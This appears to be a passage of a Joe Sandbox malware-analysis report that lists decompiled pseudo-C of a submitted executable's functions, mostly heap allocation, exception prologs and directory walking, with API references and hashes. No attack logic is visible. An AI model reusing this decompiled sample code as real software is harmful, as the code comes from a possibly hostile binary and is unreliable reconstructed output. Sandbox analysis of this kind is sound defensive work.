                                          0x0040d1ce
                                          0x0040d1d2
                                          0x0040d1d4
                                          0x0040d1d7
                                          0x0040d1dc
                                          0x0040d1dc
                                          0x0040d1df
                                          0x0040d1e6
                                          0x0040d1ea
                                          0x0040d1ef
                                          0x0040d1f6
                                          0x0040d1fc
                                          0x0040d208
                                          0x0040d20a
                                          0x0040d20c
                                          0x0040d22f
                                          0x0040d235
                                          0x0040d236
                                          0x0040d23b
                                          0x0040d23d
                                          0x0040d240
                                          0x0040d263
                                          0x0040d26a
                                          0x0040d271
                                          0x0040d27c
                                          0x0040d284
                                          0x0040d288
                                          0x0040d28d
                                          0x0040d28f
                                          0x0040d293
                                          0x0040d298
                                          0x0040d298
                                          0x0040d29b
                                          0x0040d242
                                          0x0040d245
                                          0x0040d249
                                          0x0040d24e
                                          0x0040d250
                                          0x0040d254
                                          0x0040d259
                                          0x0040d259
                                          0x0040d25c
                                          0x0040d25c
                                          0x0040d20e
                                          0x0040d211
                                          0x0040d215
                                          0x0040d21c
                                          0x0040d220
                                          0x0040d225
                                          0x0040d225
                                          0x0040d228
                                          0x0040d228
                                          0x0040d2c3
                                          0x0040d2cc

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040D1B0
                                            • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                            • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                          • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                                          • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                          • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404C4A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00404C4A(intOrPtr* __ecx, void* __eflags) {
				void* _t33;
				intOrPtr _t43;
				void* _t47;
				intOrPtr _t53;
				intOrPtr* _t82;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				E00413954(E004195D4, _t84);
				_t87 = _t86 - 0x64;
				_t82 = __ecx;
				E00404D51(_t84 - 0x70);
				_t53 = 0;
				_push(0x5c);
				 *((intOrPtr*)(_t84 - 4)) = 0;
				E00405468(_t84 - 0x1c, __ecx);
				_push(0x2a);
				 *((char*)(_t84 - 4)) = 1;
				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
				 *((char*)(_t84 - 4)) = 3;
				E00403D24(_t84 - 0x34, _t33);
				 *((char*)(_t84 - 4)) = 5;
				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
					_t87 = _t87 - 0xc;
					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
					E00403D24(_t87, _t84 - 0x1c);
					_t47 = E00404D6C(_t84 - 0x70); // executed
					if(_t47 != _t53) {
						continue;
					} else {
						 *((char*)(_t84 - 4)) = 1;
						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
						E0040551A(_t84 - 0x38);
						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
						_t43 = 0;
					}
					L7:
					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
					return _t43;
				}
				 *((char*)(_t84 - 4)) = 1;
				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
				E0040551A(_t84 - 0x38);
				if(E0040489C( *_t82, 0) != 0) {
					_t53 = E004048AA( *_t82);
				}
				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
				_t43 = _t53;
				goto L7;
			}











                                          0x00404c4f
                                          0x00404c54
                                          0x00404c59
                                          0x00404c5f
                                          0x00404c64
                                          0x00404c66
                                          0x00404c6d
                                          0x00404c70
                                          0x00404c75
                                          0x00404c7d
                                          0x00404c81
                                          0x00404c86
                                          0x00404c8e
                                          0x00404c92
                                          0x00404c9a
                                          0x00404c9e
                                          0x00404ca4
                                          0x00404cb4
                                          0x00404cbc
                                          0x00404cc3
                                          0x00404cca
                                          0x00404cd1
                                          0x00000000
                                          0x00404cd3
                                          0x00404cd6
                                          0x00404cda
                                          0x00404ce3
                                          0x00404ceb
                                          0x00404cf3
                                          0x00404cf9
                                          0x00404cfb
                                          0x00404d3d
                                          0x00404d42
                                          0x00404d4b
                                          0x00404d4b
                                          0x00404d01
                                          0x00404d05
                                          0x00404d0e
                                          0x00404d1e
                                          0x00404d27
                                          0x00404d27
                                          0x00404d2c
                                          0x00404d34
                                          0x00404d3a
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00404C4F
                                            • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                            • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                                          • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                                          • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                                          • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413EA3 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 24%
                                          			E00413EA3(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x41b988);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x425a38; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x42283c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0041570A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00416894(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E00413F69();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x425a30; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x425a34); // executed
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00415DF1();
						_v8 = _v8 | 0xffffffff;
						E00413F0A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                                          0x00413ea6
                                          0x00413ea8
                                          0x00413ead
                                          0x00413eb8
                                          0x00413eb9
                                          0x00413ec6
                                          0x00413ece
                                          0x00413f13
                                          0x00413f16
                                          0x00000000
                                          0x00413f18
                                          0x00413f18
                                          0x00413f1b
                                          0x00413f1d
                                          0x00413f29
                                          0x00413f1f
                                          0x00413f1f
                                          0x00413f22
                                          0x00413f22
                                          0x00413f2a
                                          0x00413f2d
                                          0x00413f33
                                          0x00413f63
                                          0x00413f63
                                          0x00000000
                                          0x00413f35
                                          0x00413f37
                                          0x00413f3c
                                          0x00413f3d
                                          0x00413f50
                                          0x00413f53
                                          0x00413f57
                                          0x00413f5c
                                          0x00413f5f
                                          0x00413f61
                                          0x00000000
                                          0x00000000
                                          0x00413f61
                                          0x00413f33
                                          0x00413ed0
                                          0x00413ed0
                                          0x00413ed3
                                          0x00413ed9
                                          0x00413f72
                                          0x00413f72
                                          0x00413f75
                                          0x00413f77
                                          0x00413f7b
                                          0x00413f7b
                                          0x00413f7f
                                          0x00413f7f
                                          0x00413f81
                                          0x00413f82
                                          0x00413f82
                                          0x00413f8a
                                          0x00413edf
                                          0x00413ee1
                                          0x00413ee7
                                          0x00413eeb
                                          0x00413ef2
                                          0x00413ef5
                                          0x00413ef9
                                          0x00413efe
                                          0x00413f03
                                          0x00000000
                                          0x00000000
                                          0x00413f05
                                          0x00413f03
                                          0x00413ed9
                                          0x00413f93
                                          0x00413f9e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$AllocateEnterHeapInitialize
                                          • String ID:
                                          • API String ID: 1616793339-0
                                          • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                          • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                                          • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                          • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413F9F Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 30%
                                          			E00413F9F(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x41b9a0);
				_push(E00414A2C);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x425a38; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0041570A(9);
							_v8 = 1;
							_t24 = E004167F8(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								E0041684F(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E00414061();
							goto L9;
						}
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = E00415A9D(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							E00415AC8();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E00414009();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x425a34); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                                          0x00413fa2
                                          0x00413fa4
                                          0x00413fa9
                                          0x00413fae
                                          0x00413fb4
                                          0x00413fb5
                                          0x00413fc2
                                          0x00413fc7
                                          0x00413fcd
                                          0x00413fd5
                                          0x00414015
                                          0x0041406a
                                          0x00000000
                                          0x00414017
                                          0x00414019
                                          0x0041401f
                                          0x0041402f
                                          0x00414037
                                          0x0041403c
                                          0x00414045
                                          0x0041404a
                                          0x0041404d
                                          0x00414051
                                          0x00000000
                                          0x00414056
                                          0x00413fd7
                                          0x00413fd9
                                          0x00413fdf
                                          0x00413fe4
                                          0x00413fea
                                          0x00413fef
                                          0x00413ff1
                                          0x00413ff2
                                          0x00413ff3
                                          0x00413ff9
                                          0x00413ffa
                                          0x00413ffe
                                          0x00414003
                                          0x0041405a
                                          0x0041405a
                                          0x0041405c
                                          0x0041406b
                                          0x0041406b
                                          0x00414073
                                          0x00414073
                                          0x0041405a
                                          0x00413fd5
                                          0x0041407c
                                          0x00414087

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapInitialize
                                          • String ID:
                                          • API String ID: 641406236-0
                                          • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                          • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                                          • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                          • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A011 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E0040A011(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				E00413954(E00419E67, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E004042AD(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E004042AD(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x41b6c0;
				 *(_t49 - 4) = 5;
				E004042D6();
				 *(_t49 - 4) = 2;
				E004042AD(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x41b6c8;
				 *(_t49 - 4) = 6;
				E004042D6();
				 *(_t49 - 4) = 1;
				E004042AD(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				E00407868(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                                          0x0040a016
                                          0x0040a01b
                                          0x0040a01c
                                          0x0040a021
                                          0x0040a02a
                                          0x0040a031
                                          0x0040a03c
                                          0x0040a040
                                          0x0040a045
                                          0x0040a04b
                                          0x0040a04e
                                          0x0040a056
                                          0x0040a05a
                                          0x0040a061
                                          0x0040a065
                                          0x0040a06a
                                          0x0040a06d
                                          0x0040a070
                                          0x0040a078
                                          0x0040a07c
                                          0x0040a083
                                          0x0040a087
                                          0x0040a08c
                                          0x0040a092
                                          0x0040a097
                                          0x0040a0a2
                                          0x0040a0a6
                                          0x0040a0b0
                                          0x0040a0b8

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040A016
                                            • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                          • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                                          • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                          • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004092E9 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E004092E9(void* __ecx, void* __eflags) {
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;

				E00413954(E00419BF8, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x10;
				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
				 *(_t47 - 4) = 0;
				_t22 = E00405841(__ecx + 0x20, _t41); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					E00413D3D(_t47 + 8, 0x41c4c0);
				}
				_t24 = E004042D6();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}







                                          0x004092ee
                                          0x004092f8
                                          0x004092fe
                                          0x00409303
                                          0x00409308
                                          0x00409315
                                          0x0040931c
                                          0x0040931f
                                          0x0040932b
                                          0x0040932d
                                          0x00409333
                                          0x0040933b
                                          0x00409346
                                          0x0040934d
                                          0x0040934d
                                          0x00409355
                                          0x0040935a
                                          0x00409361
                                          0x00409367
                                          0x00409370
                                          0x00409378

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004092EE
                                            • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                            • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ExceptionRaise
                                          • String ID:
                                          • API String ID: 2062786585-0
                                          • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                          • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                                          • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                          • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404D6C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E00404D6C(void* __ecx) {
				signed char _t18;
				intOrPtr* _t24;
				void* _t25;
				void* _t27;
				void* _t30;
				void* _t41;

				E00413954(E004195F0, _t41);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t18 =  *(__ecx + 0x20) >> 4;
				_t46 = _t18 & 0x00000001;
				if((_t18 & 0x00000001) == 0) {
					_t30 = __ecx + 0x28;
					__eflags = _t30;
					_push(_t30);
					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
					_push( *((intOrPtr*)(_t41 - 0x18)));
				} else {
					_push(__ecx + 0x28);
					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
					 *(_t41 - 4) = 1;
					_t25 = E00404C4A(_t24, _t46); // executed
					_t27 = _t25;
					_push( *((intOrPtr*)(_t41 - 0x18)));
				}
				E00403A9C();
				E00403A9C( *((intOrPtr*)(_t41 + 8)));
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t27;
			}









                                          0x00404d71
                                          0x00404d7d
                                          0x00404d81
                                          0x00404d84
                                          0x00404d86
                                          0x00404da9
                                          0x00404da9
                                          0x00404daf
                                          0x00404dbf
                                          0x00404dc1
                                          0x00404d88
                                          0x00404d8e
                                          0x00404d92
                                          0x00404d99
                                          0x00404d9d
                                          0x00404da2
                                          0x00404da4
                                          0x00404da4
                                          0x00404dc4
                                          0x00404dcc
                                          0x00404dd9
                                          0x00404de1

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00404D71
                                            • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                            • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                                          • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                                          • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                                          • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004027A6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004027A6(void* __ecx) {
				void* _t17;
				signed int _t31;
				intOrPtr _t34;
				void* _t36;

				E00413954(E0041919C, _t36);
				E00401CE1(_t36 - 0x18, __ecx + 0x10);
				_t34 =  *((intOrPtr*)(_t36 + 8));
				_t31 = 0;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				if( *((intOrPtr*)(_t34 + 8)) > 0) {
					do {
						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
						E00401DB8(_t36 - 0x18, 0x5c);
						_t31 = _t31 + 1;
					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
				}
				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t17;
			}







                                          0x004027ab
                                          0x004027bc
                                          0x004027c1
                                          0x004027c4
                                          0x004027c6
                                          0x004027cc
                                          0x004027ce
                                          0x004027d7
